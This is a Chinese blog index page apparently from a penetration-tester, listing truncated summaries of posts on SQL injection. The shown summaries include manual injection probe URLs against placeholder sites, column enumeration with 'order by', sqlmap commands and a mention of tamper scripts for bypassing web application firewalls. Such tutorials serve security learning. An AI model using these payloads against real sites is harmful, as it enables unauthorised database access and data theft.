摘要: 0x1 判断注入点: http://www.xxxx.ro/s.php?id=1' 那么尝试闭合下单引号 http://www.xxxx.ro/s.php?id=1' --+ 0x2 枚举下表的列 http://www.xxxx.ro/s.php?id=1' order by 4 --+ http: 阅读全文
posted @ 2019-05-08 19:53 APT-101 阅读(516) 评论(0) 推荐(0)
摘要: 0x1 判断注入点: http://www.xxx.org/members.php?id=1 and 1=1 --+ # ture http://www.xxx.org/members.php?id=1 and 1=2 --+ # fase 0x2 枚举当前的列 http://www.xxx.org 阅读全文
posted @ 2019-05-08 16:14 APT-101 阅读(339) 评论(0) 推荐(0)
摘要: sqlmap 是一款注入神器广为人知,里面的 tamper 常常用来绕过 WAF ,很实用的模块,但是却常常被新手忽略(比如我),今天就整理总结一下 tamper 的用法以及 tamper 的编写 PS:工具既然叫做工具,就是用来辅助上单的,呸辅助我们完成某些任务的,仅仅适用于当进行某些重复的繁琐工 阅读全文
posted @ 2019-05-08 10:38 APT-101 阅读(2608) 评论(0) 推荐(0)
摘要: /pentest/database/sqlmap/txt/ common-columns.txt 字段字典 common-outputs.txt common-tables.txt 表字典 keywords.txt oracle-default-passwords.txt user-agents.t 阅读全文
posted @ 2019-05-08 10:30 APT-101 阅读(378) 评论(0) 推荐(0)
摘要: 一、SQLMAP用于Access数据库注入 python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id 阅读全文
posted @ 2019-05-08 10:18 APT-101 阅读(4148) 评论(0) 推荐(0)